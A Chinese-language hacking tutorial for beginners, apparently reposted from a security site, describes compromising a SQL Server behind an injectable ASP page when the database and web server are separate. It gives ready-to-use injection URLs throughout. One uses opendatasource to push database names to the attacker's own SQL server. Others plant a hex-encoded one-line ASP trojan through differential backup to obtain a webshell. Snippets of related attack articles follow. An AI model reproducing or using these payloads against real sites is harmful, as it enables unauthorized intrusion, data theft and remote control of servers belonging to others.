注入过程中遇到DB_OWNER的想法(图)_漏洞研究

首先先声明这个文章是写给菜鸟朋友看的

    .现在注入横飞!工具一大堆,过去手工注入的时代已经不复存在!代之的是NBSI HDSI 啊D注入工具..等等.也是广大菜鸟的最爱了.即使什么也不会.什么也不懂.只需要点几下鼠标.存在注入漏洞的网站密码就出来了.接下来就是扫扫后台.传传马.就完了.就这样简单.碰到SA权限的话就.直接建立号开3389或者上传WEBSHELL.是内网就映射.是DB_OWNER权限的话呢就考虑用备份差异.但是WEB和数据库不在同一台服务器该怎么搞呢?其实也不一定是搞不定.除了往注册表启动键值写DOS命令,让目标服务器下会开机执行,不过也是有局限性的.该用户必须授权于Master这个库.才可调用储存过程.很少有管理员会这样做.所以希望很渺小.如果我们遇到这种情况的话该如何搞呢?看图1


DB权限.列下目录看看数据是否跟WEB在一块.要是在一块可考虑备份差异.不过很可惜.找来找去都没有找到WEB目录.如图2

javascript:resizepic(this) border=0>

这是利用MSSQL的XP_dirtree储存过程读取路径.然后写入临时表的结果.以前的NBSI没这功能.小菜门只好扫扫SA啊。弄弄后台之类的.后来NBSI增加了treelist的功能.可列出目录,更为方便查看目录结构.软件信息等等.后来臭要饭的开发了Getwebshell才使这功能毕生光芒,把马插到数据库里,然后把数据库备份为ASP文件.行是可行.但是数据库要是过大的话.几十M的WEBSHELL你说能用吗?Xiaolu的备份差异还算不错了.减少文件大小.进行差异备份.不过还是回到原来一点.数据和WEB不在一块......

  其实.即使数据库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般服务器装好系统什么的.都会装个IIS吧?列他C盘.看看有没有Inetpub这个目录.就知道他有没有装IIS了.但是.不知道他IP也?怎么办呢?可以这样来,PING一下WEB服务器.扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢?可以利用opendatasource宏让对方的SQL与自己的数据库建立连接.既然能建立连接.就可以得到数据库服务器的IP地址了.我们来试试看.有几个前提得说一下.第一.你机器必须要有公网IP.而且开放的1433端口要保证能被外网访问到.好.条件满足.就开始做吧!

我现在搞的这站.100%数据和WEB不在一块.但是从C盘看到了Inetpub文件夹.说明这数据库服务器安装了IIS.但是得不到他IP呀.怎么搞哦.简单.就用上面所说的方法搞一下.先在本机建个库先.打开查询分析器输入
create database hack520 CREATE TABLE zhu(name nvarchar(256) null);CREATE TABLE J8(id int NULL,name nvarchar(256) null); 点执行.如图4

javascript:resizepic(this) border=0>

建立了一个hack520的库名.和zhu  J8两个表.zhu里面有name这一个字段.J8也放了两字段名.一个是id一个是name.好了.现在就可以开始建立连接了~~~~~~~先看一下这条SQL语句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用户;pwd=SQL密码;database=建立的库名') .库名.表名 '执行的语句'  恩现在开始吧...

http://www.xxx.com/news.asp?id=126'insert%20into%20opendatasource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

在IE上执行咯.呵呵这个时候对方就会连接到我机器的SQL服务器.不信?netstat -an看一下~图5

javascript:resizepic(this) border=0>

哈哈已经连过来了.现在数据库服务器IP知道了.而且数据库服务器又开了80.现在干什么呢?bak一个webshell上去吧.已知WEB目录C:\Inetpub\wwwroot.好.开始
http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737339323238 backup database @a to disk=@s-- 备份当前库

http://www.xxx.com/news.asp?id=126;Drop table [hack520];create table [dbo].[hack520] ([cmd] [image])--  建表

http://www.xxx.com/news.asp?id=126;insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--  插入蓝屏木马

http://www.xxx.com/news.asp?id=126;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433A5C496E65747075625C777777726F6F745C7A68752E617370  backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- 再次以差异备份得到WEBSHELL http://221.216xxx.xx/zhu.asp

接下来就是用蓝屏木马客户端连接咯.这个就简单了.我这里就不多说了.虽然没有拿到WEB服务器的SHELL.但是至少也不是空手而归.拿到了数据库服务器的SHELL.就到这里.88

时间: 2025-01-29 16:27:01

注入过程中遇到DB_OWNER的想法(图)_漏洞研究的相关文章

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

MSHTA漏洞为黑客大开远程控制之门(图)_漏洞研究

这是一个可以让黑客欣喜若狂的新漏洞,一旦该漏洞被激活,就会有大量计算机成为黑客手中的肉鸡,被人远程控制不可避免-- 微软的Windows操作系统在进行了短暂的"喘息"后,近日又在攻击爱好者不懈努力下,被成功找出几个高危的系统安全漏洞,而Microsoft Windows MSHTA脚本执行漏洞就是其中的重要一员. 安全公告牌 MSHTA即HTA,此处的MS主要用于强调这是微软的漏洞,HTA全名为HTML Application,就是HTML应用程序,其实只要简单地用"hta&

新兴木马NameLess BackDoor复仇记(图)_漏洞研究

NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹.说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess.这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了.而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能.同时NameLess BackDoor又去除了各处的缺点,比如反弹的c

用漏洞提升计算机控制权限(图)_漏洞研究

据称Windows COM结构存在安全问题,本地或远程攻击者可以利用这个漏洞提升特权或执行任意指令.受影响的操作系统和程序在处理COM结构化存储文件时,在访问共享内存的方式中存在权限提升漏洞,一个已登录的用户可利用此漏洞完全控制系统.  安全公告牌  这是一个权限提升漏洞. 成功利用此漏洞的攻击者可以完全控制受影响的系统. 攻击者可随后安装程序;查看.更改或删除数据;或者创建拥有完全用户权限的新账户. 要利用此漏洞,攻击者必须能够本地登录到系统并运行程序.  受影响的系统包括:Windows 2

PHP博客程序C-blog2.0漏洞测试大揭密(图)_漏洞研究

c-blog2.1测试手记 朋友买了空间支持php但是没有mysql数据库,说是这空间商主要是支持asp脚本的.哎 难道就不能玩php了吗?  嘿嘿 可以用php+access的php程序啊.百度了下发现了c-blog这个程序,它有个php+access版本的.down下了看看,就有了这次测试的结果. 1.暴出物理路径 在看了这个blog后,发现他写的到上没什么太大的bug,文件比较少而且简结. 它的说明上看到了如下: ./include   包含常用类库 编辑器 配置文件 -->/config

渗透技术一瞥(图)_漏洞研究

渗透是指入侵者直接用被入侵对象原有的功能来完成的入侵,它可以使用各种方法进行.无论是个人用户.数据库管理员还是网站管理员,要构造一个安全的网站论坛.数据库服务器以及安全的SQL语句脚本,了解渗透技术潜在的危害都非常有必要. 很多用户都有这样一种感觉:计算机信息安全技术或者黑客关心的一些东西都比较高深,其实不然,比如渗透技术,可能仅仅是这个专业的技术名词就已经让你有点眩晕了,但是你知道吗,在日常的计算机应用中,你常常会与渗透技术擦肩而过. 让我们举一个小例子来做个简单的说明:如果我告诉你"' or

从广告邮件到肉鸡成群(图)_漏洞研究

我的私人信箱多次接到化妆品广告邮件,感觉不像是种毒的,于是点开连接去看看,原来是一个卖化妆品的商务网站.看上去较漂亮,就是不知安全性如何?以前注意过天意商务网,但这个较陌生,不知是什么系统(如图1所示). 图1     习惯性地看看有无上传之处,居然没有发现有上传图片或其它东东的地方.不死心,注册一个用户,仍然没有发现可以上传或发表文章之处.再看看有无注入漏洞,在网址后面加上"'",提示"请勿输入非法字符",说明已做了防注入处理.不甘心啊!再加上"and

“灰鸽子”网页木马从原理、制作到防范(图)_漏洞研究

事物都有两面性.本文介绍的网页木马制作技巧,意在加强大家的防范意识,而不是想"荼毒生灵".希望能给大家带来一些帮助,营造一个安全的上网环境. 如果你访问××网站(国内某门户网站),你就会中灰鸽子木马.这是我一黑客朋友给我说的一句说.打开该网站的首页,经检查,我确实中了灰鸽子.怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马:一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马. 以上只是网页木马的两种形式,实际上

图片引发的溢出危机(图)_漏洞研究

就在刚迈入2006年之际,Windows系统出现了一个严重的漏洞,这就是Microsoft Windows图形渲染引擎wmf格式代码漏洞(ms0601).这个漏洞出现在Windows的图形渲染引擎中,黑客可以构造恶意的wmf文件,引诱其他用户打开,当系统没有更新过wmf补丁时,将会执行黑客事先设置好的恶意代码,获取系统的最高权限,从而完全听命于黑客.就在漏洞公布几天后,网络上使用wmf漏洞进行传播的病毒.攻击事件不断,直至今日,网上仍然充斥着无数利用wmf漏洞的攻击.本文将向大家介绍有关wmf漏